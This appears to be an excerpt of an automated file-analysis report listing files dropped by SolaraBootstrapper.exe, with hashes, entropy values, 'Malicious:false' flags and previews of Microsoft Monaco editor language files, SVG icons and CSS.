                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/redis/redis",["require","exports"],function(E,e){"use strict";Object.defineProperty(e,"__esModule",{value:!0}),e.conf={brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}]},e.language={defaultToken:"",tokenPostfix:".redis",ignoreCase:!0,brackets:[{open:"[",close:"]",token:"delimiter.square"},{open:"(",close:")",token:"delimiter.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (11765)
                                                  Category:dropped
                                                  Size (bytes):12172
                                                  Entropy (8bit):5.039131276343241
                                                  Encrypted:false
                                                  SSDEEP:192:hZnzLxzLJlx3dDC5QPsHoa2WMrtSCV0bPjNQoMyIG6r9TjasW:hBLxztR+MJ/WfCuFQobIGe9/asW
                                                  MD5:C08941967AC5BA8CC4A2971B2C888456
                                                  SHA1:22D1A7F1E89D9850507D5EBA78BF734764D7197F
                                                  SHA-256:B461F7951EFFBF085CD7A090DD4E69E54F812A2543F55A4ECACAEE7EF6649BDF
                                                  SHA-512:9311C13BE9E19C0062870BD4C2B92815BF4427056DBBBD6A2EC71ED76C8C66C4138F929776CE788C918C51813A61F0E05F00EAC984B51FBCC16620958F3655CA
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/redshift/redshift",["require","exports"],function(e,_){"use strict";Object.defineProperty(_,"__esModule",{value:!0}),_.conf={comments:{lineComment:"--",blockComment:["/*","*/"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}]},_.language={defaultToken:"",tokenPostfix:".sql",ignoreCase:!0,brackets:[{open:"[",close:"]",token:
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (8098)
                                                  Category:dropped
                                                  Size (bytes):8505
                                                  Entropy (8bit):5.304325009388277
                                                  Encrypted:false
                                                  SSDEEP:192:hZn4cxI35E7BuN7MVziYlG3z9GEpWyuy7:hScx+E7cMwj9Fsvu
                                                  MD5:9D0EDDEAE6D9BF3D3D9EEBF7858B45BD
                                                  SHA1:6F0FB7FEB21491FA8E46763945C266880D904461
                                                  SHA-256:5F249877EEF9E52F52DBE2BB4B158DA3A6F7FC2D267487298D537292596B6089
                                                  SHA-512:EEEE65842033CC4F122689FFC7C3C660317D5C5D411C452EA73A26F71D041AB05C8BEB6D0FD3B2D8A8FC787AC408007B0F6785B867FBDB1C55AB94EB75C017D3
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/ruby/ruby",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.conf={comments:{lineComment:"#",blockComment:["=begin","=end"]},brackets:[["(",")"],["{","}"],["[","]"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}]},t.language={tokenPostfix:".ruby",keywords:["__LINE__","__ENCODING__","__FILE__","BEGIN","END","alias"
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3897)
                                                  Category:dropped
                                                  Size (bytes):4304
                                                  Entropy (8bit):5.391932938704175
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRs6Q9rbV1+gqVV1+/yldNmlf9LJ5MnWe1l0gHY4Rt04TW:hZnYrTO6llLJ5de3i4Y
                                                  MD5:F48A41336BCC1A195503C7A020EA508C
                                                  SHA1:75F5BC806C449422E7A56DE8FC3C1E3626768A12
                                                  SHA-256:7C4E77F3BC6F3FB580C1C329F515E30830E6F6352D088B7948F73FA1662A3664
                                                  SHA-512:F4E94B5C3DCB1FB90373F92637618E774737AC1646E5B24CB28BDFDD5188AF3F61DDF49224D1459B22DDCF89B6A1FCD86884CBE2DF62F826EC9CB94C5AF1277B
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/rust/rust",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.conf={comments:{lineComment:"//",blockComment:["/*","*/"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"[",close:"]"},{open:"{",close:"}"},{open:"(",close:")"},{open:"'",close:"'",notIn:["string","comment"]},{open:'"',close:'"',notIn:["string"]}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],folding:{markers:{start:new RegExp("^\\s*#pragma\\s+region\\b")
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (1800)
                                                  Category:dropped
                                                  Size (bytes):2207
                                                  Entropy (8bit):5.251341327640964
                                                  Encrypted:false
                                                  SSDEEP:48:hFDMgRs/F60K5J1JFq11FqQHTgVgN88KEqWgdctA0VeQ:hFDMgRsUdTq17qG8EQRW6PQ
                                                  MD5:95A88FD3AC1433BC136A792BD892C1D2
                                                  SHA1:7E75796E0896B429E4D4DBDEAF83ADFF3C8AEF29
                                                  SHA-256:51C0BBDE8B266514A37F00707C34BAB27571B7EB38BDDC5A45BB3F987CE5227D
                                                  SHA-512:0CDECC828BCF7E49FDD7BE2F2E27B099D1FB3465D13B18E61B4BAF1BCCB8D78560666AE503EF1ADF6BE62975F96B685BB922C59ECC203E598C502E2E91CDDC94
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/sb/sb",["require","exports"],function(e,o){"use strict";Object.defineProperty(o,"__esModule",{value:!0}),o.conf={comments:{lineComment:"'"},brackets:[["(",")"],["[","]"],["If","EndIf"],["While","EndWhile"],["For","EndFor"],["Sub","EndSub"]],autoClosingPairs:[{open:'"',close:'"',notIn:["string","comment"]},{open:"(",close:")",notIn:["string","comment"]},{open:"[",close:"]",notIn:["string","comment"]}]},o.language={defaultToken:"",tokenPostfix:".sb",ignoreCase:!0,brackets:[{token:"delimiter.array",open:"[",close:"]"},{token:"delimiter.parenthesis",open:"(",close
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (6384)
                                                  Category:dropped
                                                  Size (bytes):6791
                                                  Entropy (8bit):5.086201877298942
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRsJ6rMq+q17qcq6V1+/Zpj1ctjT0PIVhUE5CsqdpvcWLPMlxXALYJvc:hZe6rr9AnhPKIsuvcWLPMfXALCvc
                                                  MD5:3E266F1F8EAAAE110C8AE9E31FE5CB41
                                                  SHA1:D939D3B5CB8A5DF6FCA3CE2531FD633E59FE34B2
                                                  SHA-256:438F781E751495302A0E2359EA93B54D7F9CBA383FB44185D73BC6E2A5A38E81
                                                  SHA-512:4BBEF3FEBBDCEBCAF8242107BF5E260EBD92BD99D00777316A2DFE29865A2D20AB11808B23D9616D77550E82D69AF71FADDA95EB41E83387516C21480DEFFBE0
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/scss/scss",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.conf={wordPattern:/(#?-?\d*\.\d\w*%?)|([@$#!.:]?[\w-?]+%?)|[@#!.]/g,comments:{blockComment:["/*","*/"],lineComment:"//"},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}",notIn:["string","comment"]},{open:"[",close:"]",notIn:["string","comment"]},{open:"(",close:")",notIn:["string","comment"]},{open:'"',close:'"',notIn:["string","comment"]},{open:"'",close:"'",notIn:["string","comment"]}],surroundingPairs:[{open:"{",close:
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (18566)
                                                  Category:dropped
                                                  Size (bytes):18973
                                                  Entropy (8bit):4.504039135914546
                                                  Encrypted:false
                                                  SSDEEP:384:hSrtoAZRoMteOKV6TXRcJcWlXvEnMemjVjlVuRHBziYQ:crtoZOA6TKJccXcnMemZ+HFA
                                                  MD5:0C117B4DC07C6A0A0D063D1504E04EA6
                                                  SHA1:3F72A2469DF69925E2C9FA31066A56A4327ACDE4
                                                  SHA-256:E71C1DF85CED6A51254A45152CEB9BAB1EC3A003E8E4911AB35C737B52D42AE4
                                                  SHA-512:8A209F5CB7503E716C470728D744E0674717E63DF2DB3590086F09866047C6F668D8D393A510320C2A1658D9026B5A968164BA3FCEAD36B270C364B0E663F5F2
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/solidity/solidity",["require","exports"],function(x,e){"use strict";Object.defineProperty(e,"__esModule",{value:!0}),e.conf={comments:{lineComment:"//",blockComment:["/*","*/"]},brackets:[["{","}"],["[","]"],["(",")"],["<",">"]],autoClosingPairs:[{open:'"',close:'"',notIn:["string","comment"]},{open:"{",close:"}",notIn:["string","comment"]},{open:"[",close:"]",notIn:["string","comment"]},{open:"(",close:")",notIn:["string","comment"]}]},e.language={defaultToken:"",tokenPostfix:".sol",brackets:[{token:"delimiter.curly",open:"{",close:"}"},{token:"delimiter.pare
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (18212)
                                                  Category:dropped
                                                  Size (bytes):18619
                                                  Entropy (8bit):4.946579324824011
                                                  Encrypted:false
                                                  SSDEEP:384:hwLxocwBLdRtOmmeuA7It3OMvZi3vzVga+hFyPWg8N7+HLJfh+kQ9/3W:KLxocwlU26lvZi7Vga+7yPkshAfW
                                                  MD5:4788F14A5C95A359AF5EE52EFBCF862D
                                                  SHA1:DD4BD763CADF57A529A0732224EC6E27CB08CBB9
                                                  SHA-256:D1AB939C0BA1033252787F1F13B503D870EE5784A23A3B0B89857860075C035B
                                                  SHA-512:F24AD9E95C092BA62C9646876858368B095234E212797EA76DF8C708EFCD4622F872AB30A21D3EC1B341E9D69924D22FAEEC8D949784A4CCBD02E3C877C68617
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/sql/sql",["require","exports"],function(E,T){"use strict";Object.defineProperty(T,"__esModule",{value:!0}),T.conf={comments:{lineComment:"--",blockComment:["/*","*/"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}]},T.language={defaultToken:"",tokenPostfix:".sql",ignoreCase:!0,brackets:[{open:"[",close:"]",token:"delimiter
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (6870)
                                                  Category:dropped
                                                  Size (bytes):7278
                                                  Entropy (8bit):4.972749078299566
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRslrafEUAV1+wCXaVcJlkGLaTNzFgigKNVKVpzVxmKRBzb/eV1+/mQVcJl3:hZIrEol2JJi1VJJsjWaGr5aVl2Xaw
                                                  MD5:7F3EF65A0F0F0AEEDCD64D57F191D7A6
                                                  SHA1:B5A95D5FEF3FC22C865CC176C0664928A2610582
                                                  SHA-256:29E530C3A0DAE1DC1B630A0867132A2513B1996B7EB0D1F4090336BD6004FF09
                                                  SHA-512:EA0508987801B487DC5370BF7D1A37C486994853EB0E1991F0EC4C9B5FFE378C7C8F701DF7D4DEFEDC34C5E23512305C6297D70A51D478E292E40C25C4A40C6A
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/st/st",["require","exports"],function(e,n){"use strict";Object.defineProperty(n,"__esModule",{value:!0}),n.conf={comments:{lineComment:"//",blockComment:["(*","*)"]},brackets:[["{","}"],["[","]"],["(",")"],["var","end_var"],["var_input","end_var"],["var_output","end_var"],["var_in_out","end_var"],["var_temp","end_var"],["var_global","end_var"],["var_access","end_var"],["var_external","end_var"],["type","end_type"],["struct","end_struct"],["program","end_program"],["function","end_function"],["function_block","end_function_block"],["action","end_action"],["step
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3842)
                                                  Category:dropped
                                                  Size (bytes):4249
                                                  Entropy (8bit):5.357421086505354
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRswdrbV1+/mQcV1+/mQSMFyb0EUiyH/l3w6Bh1D0rth:hZldrT1x1480Dv2h
                                                  MD5:1BDD6F185CD2B5F4E11C6FAC19E86175
                                                  SHA1:E812770EF107ECDF3CCF779EEBA58E0B8C0487A8
                                                  SHA-256:5E9896A1E113B93502A1249B0CC78A844B000B803410A9A956854FAAC8528366
                                                  SHA-512:E8D3811F1B7D776EA49E1DE61B5C1234D55EB0257664D8234C94EB22CD9289F7D304676D9565A69F44DC065BA569CA8B7E6A45C0FF9C62A673104C95BA4A7982
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/swift/swift",["require","exports"],function(e,o){"use strict";Object.defineProperty(o,"__esModule",{value:!0}),o.conf={comments:{lineComment:"//",blockComment:["/*","*/"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"},{open:"`",close:"`"}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"},{open:"`",close:"`"}]},o.language={defaultToken:"",tokenPostfix:".swift",identifier:/
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (5669)
                                                  Category:dropped
                                                  Size (bytes):6076
                                                  Entropy (8bit):5.1146635563321174
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRsrSVNv2q+q17qcqR5FX5BmzpMCgkxIcKYWKkVe9Nu6Ke7UivaQ:hZem1q5FJOZxWYlkVe+ewW
                                                  MD5:FD92FAAC5B4B3DFC2AA8CD7DEB8EFECF
                                                  SHA1:39BD460AFA0C614D4106602A2AFB5C2C9D7CB1B0
                                                  SHA-256:5CA2EF383CCBFD449DCEB76DB571211374314054E22977BBEB785E2AAF8ECF24
                                                  SHA-512:FDEC42D463673CBACE6B50081190F0F9D2ADF57130DA04ABAA4513C4F569AE2B676883E5D1140B38D17D0AADD602A583C0FD27D7ED071112C5093C3051266338
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/vb/vb",["require","exports"],function(e,n){"use strict";Object.defineProperty(n,"__esModule",{value:!0}),n.conf={comments:{lineComment:"'",blockComment:["/*","*/"]},brackets:[["{","}"],["[","]"],["(",")"],["<",">"],["addhandler","end addhandler"],["class","end class"],["enum","end enum"],["event","end event"],["function","end function"],["get","end get"],["if","end if"],["interface","end interface"],["module","end module"],["namespace","end namespace"],["operator","end operator"],["property","end property"],["raiseevent","end raiseevent"],["removehandler","end
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text, with very long lines (1712)
                                                  Category:dropped
                                                  Size (bytes):2119
                                                  Entropy (8bit):5.285431280573791
                                                  Encrypted:false
                                                  SSDEEP:24:hyiDMNbWRsIO3Cm4KANRmhImQTImQA6DpW4A8D2tMHZ7dDEWNpRih3aA5GNUrG9N:hFDMgRs/h4KlImQTImQB3HZ7KVMNUSN
                                                  MD5:837EFA6CBAE0C226509B3F496C20660D
                                                  SHA1:1A6263D04CD8EEA94E31583611A9C7246351482A
                                                  SHA-256:01896B21BA9FE9106316197DA8118596101B966D4597AA794720F2561CBE15D8
                                                  SHA-512:A2787C69CD3989D239CCE372FE141DDE121CAF8A637843413D590F4FF77941F10D8A8F8590BBFDB2255E97528289A7673E5377E469BEDD8F63135EF70C12A46A
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/xml/xml",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.conf={comments:{blockComment:["\x3c!--","--\x3e"]},brackets:[["<",">"]],autoClosingPairs:[{open:"<",close:">"},{open:"'",close:"'"},{open:'"',close:'"'}],surroundingPairs:[{open:"<",close:">"},{open:"'",close:"'"},{open:'"',close:'"'}]},t.language={defaultToken:"",tokenPostfix:".xml",ignoreCase:!0,qualifiedName:/(?:[\w\.\-]+:)?[\w\.\-]+/,tokenizer:{root:[[/[^<&]+/,""],{include:"@whitespace"},[/(<)(@qualifiedName)/,[{token:"delimiter"},{token:"tag",next:
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3484)
                                                  Category:dropped
                                                  Size (bytes):3891
                                                  Entropy (8bit):5.3855602251882
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRs1mV1+/0V1+/BrBU+A/B139YeCZVOQaB9+aB9R3d8rU534:hZEixerOP/Bo5VOJJFqA4
                                                  MD5:A812C4E3188D84D073A481B2CADC21BD
                                                  SHA1:A3988727891FDBCD6A0A9B88FD8AEEE6767ADA99
                                                  SHA-256:3730024B6D24B2EA2E9794123B038EEE4383E9AE94FABD849ACEB9596AD9D2D0
                                                  SHA-512:C6B9FA1CD85870DD9CE718D7D598A0456EB3E6D8CE762FC0A39FE59472D0A6CD000C2FECF0C39BEB7DFE00ECF12CF4586850FB9A93005ECEA8B23FE1538B7087
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/yaml/yaml",["require","exports"],function(e,n){"use strict";Object.defineProperty(n,"__esModule",{value:!0}),n.conf={comments:{lineComment:"#"},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],folding:{offSide:!0}},n.language={tokenPostfix:".yaml",brackets:[{token:"delimiter.bracket",open:"{",close:"}"},{token:"delimiter.squ
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:dropped
                                                  Size (bytes):4740
                                                  Entropy (8bit):4.133929597400424
                                                  Encrypted:false
                                                  SSDEEP:48:CnN6wkEX+c9Vlt4AFCj93Z0hDC7hSBnukNyhDFtrJGuG2XvS+yZCahDC7hSBnhKm:zJWFCMcfkCFGE6+yZCacJImkArbbqrAm
                                                  MD5:48E754CB54C78A85DCC9AAEA9A27847E
                                                  SHA1:8D79B23037DEB6586E4954305DCB4CAEE14AFBD2
                                                  SHA-256:D1AA361F33564E8F9D527A01A66C7CE35D73F23417432E80DDF51F562770EE79
                                                  SHA-512:F6D902B5C73B59636CB71D4019FF45CB77532BF22AAB28A8314697E24A62163A94140C97495AD5CE421C09C26E4BCBFE5A815EAE27E945C51CCD80C2BA9C3A77
                                                  Malicious:false
                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><style>.icon-canvas-transparent{opacity:0;fill:#f6f6f6}.icon-vs-out{fill:#f6f6f6}.icon-vs-bg{fill:#424242}.icon-vs-fg{fill:#f0eff1}</style><path class="icon-canvas-transparent" d="M16 16H0V0h16v16z" id="canvas"/><path class="icon-vs-out" d="M16 15H0V1h16v14z" id="outline"/><path class="icon-vs-fg" d="M9.229 7.354c.035.146.052.31.052.494 0 .234-.02.441-.06.621-.039.18-.095.328-.168.445a.687.687 0 0 1-.914.281.76.76 0 0 1-.237-.207.988.988 0 0 1-.154-.306 1.262 1.262 0 0 1-.057-.381v-.506c0-.17.02-.326.061-.465s.096-.258.168-.359a.756.756 0 0 1 .257-.232c.1-.055.21-.082.331-.082a.646.646 0 0 1 .571.32c.067.105.116.23.15.377zm-5.126.869a.557.557 0 0 0-.196.132c-.047.053-.08.112-.097.18s-.028.147-.028.233a.513.513 0 0 0 .157.39.528.528 0 0 0 .186.113.682.682 0 0 0 .242.041.76.76 0 0 0 .593-.271.897.897 0 0 0 .165-.295c.038-.113.059-.234.059-.365v-.346l-.761.11a1.29 1.29 0 0 0-.32.078zM14 3v10H2V3h12zM5.962 7.469c0-.238-.027-.451-.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:dropped
                                                  Size (bytes):4740
                                                  Entropy (8bit):4.131449641426331
                                                  Encrypted:false
                                                  SSDEEP:48:Cn7wkEX+c9Vlt4AFCj93Z0hDC7hSBnukNyhDFtrJGuG2XvS+yZCahDC7hSBnhKHG:EJWFCMcfkCFGE6+yZCacJImkArbbqrAm
                                                  MD5:6E5C0CE7EC09969F07EA6EE078EF8AD6
                                                  SHA1:DEADC5357A26852D872BFFA77D1AA19108603B25
                                                  SHA-256:7D23C0F30CB9C05C81BB15785A3299772AE3CFBE51F3E04895AA1F23FFBEBA5B
                                                  SHA-512:2B02CB82F9E4720EE43BFC8B7FE5D6DE38228329AAFBEDB589D5A219057C15F073023DECA3C1CA5B65CEA4A4F0D863EBD88C889B1D67119639FAE2CE180863BF
                                                  Malicious:false
                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><style>.icon-canvas-transparent{opacity:0;fill:#2d2d30}.icon-vs-out{fill:#2d2d30}.icon-vs-bg{fill:#c5c5c5}.icon-vs-fg{fill:#2b282e}</style><path class="icon-canvas-transparent" d="M16 16H0V0h16v16z" id="canvas"/><path class="icon-vs-out" d="M16 15H0V1h16v14z" id="outline"/><path class="icon-vs-fg" d="M9.229 7.354c.035.146.052.31.052.494 0 .234-.02.441-.06.621-.039.18-.095.328-.168.445a.687.687 0 0 1-.914.281.76.76 0 0 1-.237-.207.988.988 0 0 1-.154-.306 1.262 1.262 0 0 1-.057-.381v-.506c0-.17.02-.326.061-.465s.096-.258.168-.359a.756.756 0 0 1 .257-.232c.1-.055.21-.082.331-.082a.646.646 0 0 1 .571.32c.067.105.116.23.15.377zm-5.126.869a.557.557 0 0 0-.196.132c-.047.053-.08.112-.097.18s-.028.147-.028.233a.513.513 0 0 0 .157.39.528.528 0 0 0 .186.113.682.682 0 0 0 .242.041.76.76 0 0 0 .593-.271.897.897 0 0 0 .165-.295c.038-.113.059-.234.059-.365v-.346l-.761.11a1.29 1.29 0 0 0-.32.078zM14 3v10H2V3h12zM5.962 7.469c0-.238-.027-.451-.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (65254)
                                                  Category:dropped
                                                  Size (bytes):175911
                                                  Entropy (8bit):5.835636874673417
                                                  Encrypted:false
                                                  SSDEEP:1536:ZxP4PUPVP0PAPeMi76Q4TVq5bbhLynlDTkDatDF8Jmmvgs0aMJkn:p2bIRkDSYmmvgs0aMJK
                                                  MD5:233217455A3EF3604BF4942024B94F98
                                                  SHA1:95CD3CE46F4CA65708EC25D59DDDBFA3FC44E143
                                                  SHA-256:2EC118616A1370E7C37342DA85834CA1819400C28F83ABFCBBB1EF50B51F7701
                                                  SHA-512:6F4CB7B88673666B7DC1BEAB3EC2AEC4D7D353E6DA9F6F14ED2FEE8848C7DA34EE5060D9EB34ECBB5DB71B5B98E3F8582C09EF3EFE4F2D9D3135DEA87D497455
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Version: 0.13.2(53a4043676e6259fb734c90fad14bf16f7425640). * Released under the MIT license. * https://github.com/Microsoft/vscode/blob/master/LICENSE.txt. *-----------------------------------------------------------*/.monaco-builder-hidden{display:none!important}.monaco-action-bar{text-align:right;overflow:hidden;white-space:nowrap}.monaco-action-bar .actions-container{display:flex;margin:0 auto;padding:0;width:100%;justify-content:flex-end}.monaco-action-bar.vertical .actions-container{display:inline-block}.monaco-action-bar.reverse .actions-container{flex-direction:row-reverse}.monaco-action-bar .action-item{cursor:pointer;display:inline-block;transition:transform 50ms ease;position:relative}.monaco-action-bar .action-item.disabled{cursor:default}.monaco-action-bar.animated .action-item.active{-webkit-transform:scale(1.272019649);transform:scale(1.272019649)
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (25715)
                                                  Category:dropped
                                                  Size (bytes):2060030
                                                  Entropy (8bit):5.241126637820058
                                                  Encrypted:false
                                                  SSDEEP:24576:SmmBNDw4gCXJkB4nIg2IxhbaeZYIMsNjvit4f:wDw4gCXJk62+aeKIMsNjvit4f
                                                  MD5:9399A8EAA741D04B0AE6566A5EBB8106
                                                  SHA1:5646A9D35B773D784AD914417ED861C5CBA45E31
                                                  SHA-256:93D28520C07FBCA09E20886087F28797BB7BD0E6CF77400153AAB5AE67E3CE18
                                                  SHA-512:D37EF5A848E371F7DB9616A4BF8B5347449ABB3E244A5527396756791583CAD455802450CEEB88DCE39642C47ACEAF2BE6B95BEDE23B9ED68B5D4B7B9022B9C8
                                                  Malicious:false
